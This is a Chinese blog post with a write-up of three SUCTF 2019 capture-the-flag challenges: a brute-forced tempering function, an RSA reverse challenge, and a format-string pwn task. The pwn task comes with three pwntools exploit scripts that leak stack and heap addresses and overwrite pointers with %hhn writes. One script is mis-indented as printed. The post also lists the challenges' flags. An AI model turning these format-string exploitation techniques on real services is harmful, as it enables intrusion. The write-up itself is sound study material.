<!DOCTYPE html>
<html lang="en">
<head><meta name="generator" content="Hexo 3.9.0">
  <meta charset="utf-8">
  
  
  
  <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
  <title>
    suctf的两三题wp |
    
    The lair of C0yo7e</title>
  
    <link rel="shortcut icon" href="/images/time.png">
  
  <link rel="stylesheet" href="/css/style.css">
  
    <link rel="stylesheet" href="/fancybox/jquery.fancybox.min.css">
  
  <script src="/js/pace.min.js"></script>
</head>
</html>
<body>
<main class="content">
  <section class="outer">
  

<article id="post-playfmt" class="article article-type-post" itemscope itemprop="blogPost" data-scroll-reveal>
  
  <div class="article-inner">
    
      <header class="article-header">
        
  
    <h1 class="article-title" itemprop="name">
      suctf的两三题wp
    </h1>
  
  




      </header>
    

    
      <div class="article-meta">
        <a href="/2019/08/20/playfmt/" class="article-date">
  <time datetime="2019-08-20T14:58:39.000Z" itemprop="datePublished">2019-08-20</time>
</a>
        
      </div>
    

    
      
    <div class="tocbot"></div>





    

    <div class="article-entry" itemprop="articleBody">
      


      

      
        <p>这次suctf我参与了的好像就三道题吧，还是和队友以及大佬商讨之后才弄出来的，发现自己真的太菜了</p>
<p>以下附上超级简单题的一些思路，当做给自己的记录吧</p>
<a id="more"></a>

<h2 id="MT-crpyto"><a href="#MT-crpyto" class="headerlink" title="MT - crpyto"></a>MT - crpyto</h2><p>这是个密码题，但是我re基础有点太弱了，纯靠逆估计得逆很久，那就选择爆破吧</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br></pre></td><td class="code"><pre><span class="line">#include &lt;stdio.h&gt;</span><br><span class="line">#include &lt;stdlib.h&gt;</span><br><span class="line"></span><br><span class="line">unsigned int convert(unsigned int m) &#123;</span><br><span class="line">    m = m ^ m &gt;&gt; 13;</span><br><span class="line">    m = m ^ m &lt;&lt; 9 &amp; 2029229568ll;</span><br><span class="line">    m = m ^ m &lt;&lt; 17 &amp; 2245263360ll;</span><br><span class="line">    m = m ^ m &gt;&gt; 19;</span><br><span class="line">    return m;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">int main() &#123;</span><br><span class="line">    unsigned int i;</span><br><span class="line">    for (i = 0; i &lt;= (unsigned int)0xffffffffll; i++) &#123;</span><br><span class="line">        if (i &amp; 0xfffff == 0)</span><br><span class="line">            printf(&quot;%u\n&quot;, i);</span><br><span class="line">        if (convert(i) == (unsigned int)1679057065ll) &#123;</span><br><span class="line">            printf(&quot;%u&quot;, i);</span><br><span class="line">            break;</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br><span class="line">    return 0;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">//1679057065       2226413449</span><br><span class="line">//3818208026       2938293886</span><br><span class="line">//2854351778       1730632668</span><br></pre></td></tr></table></figure>

<p>我们发现这道题就是把给的最终结果的flag切片，四个四个以字符的形式（两个十六进制数为一个）一循环，往函数里进行异或和位移操作</p>
<p>写python脚本的时候，崩溃了，跑不出来（能读的位太小？还是我python不熟啊？）换个c发现巨方便 </p>
<p>falg : 84B45F89AF22CE7E67275BDC<br>大写发现过不去，改成小写就可以了<br>flag{84b45f89af22ce7e67275bdc} </p>
<h2 id="signup-re"><a href="#signup-re" class="headerlink" title="signup - re"></a>signup - re</h2><p>天知道第一道逆向竟然是rsa（看见熟悉的65537就知道了）<br>把n丢到网站上分出两个质数<br>然后直接丢给解rsa的脚本跑一下就出flag了（脚本来自超级可爱的队友，这里就不po出来了）</p>
<p>flag是suctf{Pwn_@_hundred_years}</p>
<h2 id="Playfmt-pwn"><a href="#Playfmt-pwn" class="headerlink" title="Playfmt - pwn"></a>Playfmt - pwn</h2><p>这道题，格式化字符串<br><img src="/2019/08/20/playfmt/%E5%9B%BE%E7%89%871.png" alt><br><img src="/2019/08/20/playfmt/%E5%9B%BE%E7%89%872.png" alt></p>
<p>看到这里觉得有些眼熟，这不是lab9的那个差不多吗，关键函数，漏洞位置都一样，然后我天真的以为可以套着lab9的方法做这道题，结果…我确实天真，写完脚本，疯狂get不到shell，发现地址没爆错啊，啥都没问题，那肯定是got表改不了的问题了，这个具体看程序函数，貌似是那个this指针？（this+1是指向flag的）</p>
<p>看程序就知道，flag是被读进了堆里，堆的地址，我不会分析，就直接爆破吧</p>
<p><img src="/2019/08/20/playfmt/%E5%9B%BE%E7%89%873.png" alt></p>
<p>偏移为6的位置作为第一个ebp，指向下一个地址，而下一个又指向了再下一个地址。偏移分别为6 、14 、26，蓝色字体的地址为heap的地址，选择爆破的话，泄露那个应该都OK<br>我们知道flag是被写进堆里的，我们就把heap的地址存入ebp指向的地址处，同时会被存进26个偏移的位置（方便读取数据）</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br></pre></td><td class="code"><pre><span class="line">#!/usr/bin/env python</span><br><span class="line"># -*- coding: utf-8 -*-</span><br><span class="line">from pwn import *</span><br><span class="line">context.log_level = &apos;debug&apos;</span><br><span class="line">p = process(&apos;./playfmt&apos;)</span><br><span class="line"># p = remote(&apos;120.78.192.35&apos;,9999)</span><br><span class="line">elf = ELF(&apos;./playfmt&apos;)</span><br><span class="line">libc = ELF(&apos;/lib/i386-linux-gnu/libc.so.6&apos;)</span><br><span class="line"></span><br><span class="line">printf_got = elf.got[&apos;printf&apos;]</span><br><span class="line">system_libc = libc.symbols[&apos;system&apos;]  </span><br><span class="line">printf_libc = libc.symbols[&apos;printf&apos;]  </span><br><span class="line"></span><br><span class="line">def read_addr(target_addr):</span><br><span class="line">    index1 = 6   #偏移是6的地方作为第一个ebp</span><br><span class="line">    index2 = 14   #偏移是14的地方作为ebp2     --&gt;   ebp里存的是ebp2的地址</span><br><span class="line">    value_ls = map(ord, p32(target_addr))</span><br><span class="line">    low_byte = stack_addr &amp; 0xff</span><br><span class="line">for i in range(4):   </span><br><span class="line">#stack地址就为ebp2处的地址，不变，heap的地址存在ebp2里，ebp2会指向ebp3，所以地址同时写入ebp3中</span><br><span class="line">#我对这个的理解是：第一处的payload代表每个ebp里的字节存入单字节heap的地址</span><br><span class="line">        payload = &apos;%&#123;&#125;c%&#123;&#125;$hhn\n\x00&apos;.format(low_byte + i, index1)</span><br><span class="line">        p.sendline(payload)</span><br><span class="line">        p.recvline()</span><br><span class="line">        payload = &apos;%&#123;&#125;c%&#123;&#125;$hhn\n\x00&apos;.format(value_ls[i], index2)</span><br><span class="line">        p.sendline(payload)</span><br><span class="line">        p.recvline()</span><br><span class="line"></span><br><span class="line">    success(&apos;target &apos; + hex(target_addr))</span><br><span class="line">    payload = &apos;%26$p\n\x00&apos;   #ebp2指向的地址处，只存放target_addr，可直接读取</span><br><span class="line">    p.sendline(payload)</span><br><span class="line">    p.recvline()</span><br><span class="line">    payload = &apos;%26$s\n\x00&apos;</span><br><span class="line">    p.sendline(payload)</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"></span><br><span class="line">p.recv()</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">payload = &apos;.%14$p.%18$p.\x00&apos;    #%19$p也可</span><br><span class="line">p.sendline(payload)</span><br><span class="line">p.recvuntil(&quot;.&quot;)</span><br><span class="line">stack_addr = int(p.recv(10),16)</span><br><span class="line">success(&apos;stack &apos; + hex(stack_addr))</span><br><span class="line">p.recvuntil(&quot;.&quot;)</span><br><span class="line">heap_addr = int(p.recv(9),16)</span><br><span class="line"></span><br><span class="line">success(&apos;stack &apos; + hex(stack_addr))</span><br><span class="line">success(&apos;heap &apos; + hex(heap_addr))</span><br><span class="line">for i in range(-0x1000, 0, 0x4):      </span><br><span class="line">#这里就随意循环heap的地址，找到flag字符，然后打印出来即可</span><br><span class="line">        success(&apos;offset &apos; + hex(i))</span><br><span class="line">        read_addr(heap_addr + i)</span><br><span class="line">        ret = p.recvline()</span><br><span class="line">        if &apos;suctf&apos; in ret:</span><br><span class="line">            print(ret)</span><br><span class="line">            p.interactive()</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">p.interactive()</span><br></pre></td></tr></table></figure>

<p>然后找大佬问了一下怎么确定flag到底写在了哪里，发现是我自己c和数据结构没学好……果然逆向基础和代码基础还是很重要的（一句话，我太菜了）</p>
<p>V5是new出来的一个堆，这里的传参为this指针，v8是flag读入的堆，这里是a2（*this+1）</p>
<p><img src="/2019/08/20/playfmt/%E5%9B%BE%E7%89%874.png" alt><br>Ida里找各个值的地址啥的<br><img src="/2019/08/20/playfmt/%E5%9B%BE%E7%89%875.png" alt><br>New出来的v3为this，地址为[heap]0x08810E30<br><img src="/2019/08/20/playfmt/%E5%9B%BE%E7%89%876.png" alt><br>其实看这个就能知道flag写在了末尾一个半字节为a10的地方，没关系，我们接着调。</p>
<p>我们输入%1$p发现它跳到了一个地方<br><img src="/2019/08/20/playfmt/%E5%9B%BE%E7%89%877.png" alt></p>
<p>发现其实它还没输出东西，那我们就继续往下执行，到printf执行之后，打印出第一个偏移处的地址<br><img src="/2019/08/20/playfmt/%E5%9B%BE%E7%89%878.png" alt></p>
<p>然后ida里，可以看见就在printf下面，那我们就算this的位置偏移是多少（数出来是19）<br><img src="/2019/08/20/playfmt/%E5%9B%BE%E7%89%879.png" alt><br>我们修改一下ebp的地址，使他指向堆的地址（上面有说到第26个偏移的地方指向堆的地址，我们就把它改到ebp），然后我们把ebp2里指向的堆地址改成this+1的地址</p>
<p>我们tel一下查看堆里的信息，发现其实this+1里存的是flag的地址（上面的flag是自己本机的）<br><img src="/2019/08/20/playfmt/%E5%9B%BE%E7%89%8710.png" alt><br>然后我们就可以通过%19$s输出真实地址<br>再把它写入ebp2，然后再执行%19$s就可以了<br>Po个exp（来自一位特别特别好的大佬）</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br></pre></td><td class="code"><pre><span class="line">#!/usr/bin/env python</span><br><span class="line"># -*- coding: utf-8 -*-</span><br><span class="line">from pwn import *</span><br><span class="line">context.log_level = &apos;debug&apos;</span><br><span class="line">p = remote(&apos;120.78.192.35&apos;,9999)</span><br><span class="line">elf = ELF(&apos;./playfmt&apos;)</span><br><span class="line"></span><br><span class="line">p.recv()</span><br><span class="line">payload = &apos;%6$p&apos;</span><br><span class="line">p.sendline(payload)</span><br><span class="line">sleep(1)</span><br><span class="line">################## ebp&amp;ret</span><br><span class="line">log_ebp = int(p.recv(),16)#logo ebp 14$ 0xffffd048</span><br><span class="line">do_fmt_ebp = log_ebp - 0x20#do fmt ebp 6$ 0xffffd028</span><br><span class="line">do_fmt_return = log_ebp -0x1c#do_fmt return_to 7$</span><br><span class="line"></span><br><span class="line">log.info(&quot;log_ebp--&gt;p[%s]&quot;%hex(log_ebp))</span><br><span class="line">log.info(&quot;do_fmt_ebp1--&gt;p[%s]&quot;%hex(do_fmt_ebp))</span><br><span class="line">log.info(&quot;do_fmt_return--&gt;p[%s]&quot;%hex(do_fmt_return))</span><br><span class="line">#################3 this_addr,flag_addr_off</span><br><span class="line"></span><br><span class="line">payload = &apos;%19$p&apos;</span><br><span class="line">p.sendline(payload)</span><br><span class="line">sleep(1)</span><br><span class="line">heap_addr=int(p.recv(),16)#0x8050e30</span><br><span class="line">flag_addr_off=heap_addr+4 #0x8050e34</span><br><span class="line">log.info(&apos;heap_addr--&gt;p[%s]&apos;%hex(heap_addr))</span><br><span class="line">log.info(&apos;flag_addr_off--&gt;p[%s]&apos;%hex(flag_addr_off))</span><br><span class="line"></span><br><span class="line">################# change this to *flag on stack</span><br><span class="line">heap_addr_part=heap_addr &amp; 0xFF#0e30</span><br><span class="line">log_ebp_part=log_ebp &amp; 0xFF#d048</span><br><span class="line">heap_addr_stack_part=(log_ebp+0x14)&amp;0xFF#D05c</span><br><span class="line"></span><br><span class="line">log.info(&apos;heap_addr_part--&gt;p[%s]&apos;%hex(heap_addr_part))</span><br><span class="line">log.info(&apos;log_ebp_part--&gt;p[%s]&apos;%hex(log_ebp_part))</span><br><span class="line">log.info(&apos;heap_addr_stack_part--&gt;p[%s]&apos;%hex(heap_addr_stack_part))</span><br><span class="line"></span><br><span class="line">payload=&apos;%&apos;+str(heap_addr_stack_part)+&apos;d%6$hhn&apos;</span><br><span class="line">p.sendline(payload)</span><br><span class="line">p.recv()</span><br><span class="line"></span><br><span class="line">payload=&apos;%&apos;+str(heap_addr_part+4)+&apos;d%14$hhn&apos;</span><br><span class="line">p.sendline(payload)</span><br><span class="line">p.recv()</span><br><span class="line"></span><br><span class="line">#gdb.attach(p)</span><br><span class="line">################# leak flag_addr</span><br><span class="line">payload=&apos;%19$s\x00&apos;</span><br><span class="line">p.sendline(payload)</span><br><span class="line">flag_addr=u32(p.recv(4))</span><br><span class="line">#################</span><br><span class="line">payload=&apos;%&apos;+str(flag_addr&amp;0xFFFF)+&apos;d%14$hn&apos;</span><br><span class="line">p.sendline(payload)</span><br><span class="line">p.recvuntil(&apos;134515884&apos;)  #%1$p的地址 0x8048CAC</span><br><span class="line">p.sendline(&apos;%19$s\x00&apos;)</span><br><span class="line"></span><br><span class="line">p.interactive()`</span><br></pre></td></tr></table></figure>

<p>我们前面不是可以知道那个flag到底是读在了a10的地方吗？那我们就直接改一个，把一个指向栈地址的改成指向堆地址的地址，就是偏移为6的那个地方啦，然后直接修改堆的低地址（18偏移的地方地址为a28,离flag的地方特别近，直接改低一个字节的地址就可以了，贼方便了）</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br></pre></td><td class="code"><pre><span class="line">#!/usr/bin/env python</span><br><span class="line"># -*- coding: utf-8 -*-</span><br><span class="line">from pwn import *</span><br><span class="line">context.log_level = &apos;debug&apos;</span><br><span class="line"># p = remote(&apos;120.78.192.35&apos;,9999)</span><br><span class="line">p = process(&apos;./playfmt&apos;)</span><br><span class="line">elf = ELF(&apos;./playfmt&apos;)</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">p.recvuntil(&quot;=\n&quot;)</span><br><span class="line">p.sendlineafter(&quot;=\n&quot;,&quot;%6$p&quot;)</span><br><span class="line">s = p.recvuntil(&quot;\n&quot;)</span><br><span class="line">stack_addr = int(s.strip(),16)</span><br><span class="line">print hex(stack_addr)</span><br><span class="line"></span><br><span class="line">stack = stack_addr + 0x10</span><br><span class="line">p.sendline(&quot;%&quot; + str(stack&amp;0xff) + &quot;c%6$hhn&quot;)</span><br><span class="line">p.sendline(&quot;%16c%14$hhn&quot;)</span><br><span class="line">p.sendline(&quot;%18$s&quot;)</span><br><span class="line">p.interactive()</span><br></pre></td></tr></table></figure>

<p><img src="/2019/08/20/playfmt/%E5%9B%BE%E7%89%8711.png" alt></p>
<p>这道题真实的flag好像是suctf{P_rin_Tfo}</p>

      
    </div>
    <footer class="article-footer">
      <a data-url="http://yoursite.com/2019/08/20/playfmt/" data-id="ck6uu10bq00083gswtzshhssh"
         class="article-share-link">Share</a>
      
    </footer>

  </div>

  
    
  <nav class="article-nav">
    
      <a href="/2019/09/02/srop/" class="article-nav-link">
        <strong class="article-nav-caption">Newer posts</strong>
        <div class="article-nav-title">
          
            srop
          
        </div>
      </a>
    
    
      <a href="/2019/08/16/overwrite/" class="article-nav-link">
        <strong class="article-nav-caption">Olde posts</strong>
        <div class="article-nav-title">partial overwrite</div>
      </a>
    
  </nav>


  

  
    
  <div class="gitalk" id="gitalk-container"></div>
  <link rel="stylesheet" href="https://unpkg.com/gitalk/dist/gitalk.css">
  <script src="https://unpkg.com/gitalk/dist/gitalk.min.js"></script>
  <script src="https://cdn.bootcss.com/blueimp-md5/2.10.0/js/md5.min.js"></script>
  <script type="text/javascript">
    var gitalk = new Gitalk({
      clientID: '',
      clientSecret: '',
      repo: '',
      owner: 'C0yo7e',
      admin: ['C0yo7e'],
      // id: location.pathname,      // Ensure uniqueness and length less than 50
      id: md5(location.pathname),
      distractionFreeMode: false,  // Facebook-like distraction free mode
      pagerDirection: 'last'
    })

  gitalk.render('gitalk-container')
  </script>

  

</article>



</section>
  <footer class="footer">
  <div class="outer">
    <div class="float-right">
      <ul class="list-inline">
  
    <li><i class="fe fe-smile-alt"></i> <span id="busuanzi_value_site_uv"></span></li>
  
</ul>
    </div>
    <ul class="list-inline">
      <li>&copy; 2020 The lair of C0yo7e</li>
      <li>Powered by <a href="http://hexo.io/" target="_blank">Hexo</a></li>
      <li>Theme  <a href="https://github.com/zhwangart/hexo-theme-ocean">Ocean</a></li>
    </ul>
  </div>
</footer>

</main>

<aside class="sidebar sidebar-specter">
  
    <button class="navbar-toggle"></button>
<nav class="navbar">
  
    <div class="logo">
      <a href="/"><img src="/images/time.png" alt="The lair of C0yo7e"></a>
    </div>
  
  <ul class="nav nav-main">
    
      <li class="nav-item">
        <a class="nav-item-link" href="/">Home</a>
      </li>
    
      <li class="nav-item">
        <a class="nav-item-link" href="/archives">Archives</a>
      </li>
    
      <li class="nav-item">
        <a class="nav-item-link" href="/gallery">Gallery</a>
      </li>
    
      <li class="nav-item">
        <a class="nav-item-link" href="/about">About</a>
      </li>
    
    <li class="nav-item">
      <a class="nav-item-link nav-item-search" title="搜索">
        <i class="fe fe-search"></i>
        Search
      </a>
    </li>
  </ul>
</nav>
<nav class="navbar navbar-bottom">
  <ul class="nav">
    <li class="nav-item">
      <div class="totop" id="totop">
  <i class="fe fe-rocket"></i>
</div>
    </li>
    <li class="nav-item">
      
        <a class="nav-item-link" target="_blank" href="/atom.xml" title="RSS Feed">
          <i class="fe fe-feed"></i>
        </a>
      
    </li>
  </ul>
</nav>
<div class="search-form-wrap">
  <div class="local-search local-search-plugin">
  <input type="search" id="local-search-input" class="local-search-input" placeholder="Search...">
  <div id="local-search-result" class="local-search-result"></div>
</div>
</div>
  </aside>
  <script src="/js/jquery-2.0.3.min.js"></script>
<script src="/js/jquery.justifiedGallery.min.js"></script>
<script src="/js/lazyload.min.js"></script>
<script src="/js/busuanzi-2.3.pure.min.js"></script>

  <script src="/fancybox/jquery.fancybox.min.js"></script>



  <script src="/js/tocbot.min.js"></script>
  <script>
    // Tocbot_v4.7.0  http://tscanlin.github.io/tocbot/
    tocbot.init({
      tocSelector: '.tocbot',
      contentSelector: '.article-entry',
      headingSelector: 'h1, h2, h3, h4, h5, h6',
      hasInnerContainers: true,
      scrollSmooth: true,
      positionFixedSelector: '.tocbot',
      positionFixedClass: 'is-position-fixed',
      fixedSidebarOffset: 'auto',
    });
  </script>


<script src="/js/ocean.js"></script>

</body>
</html>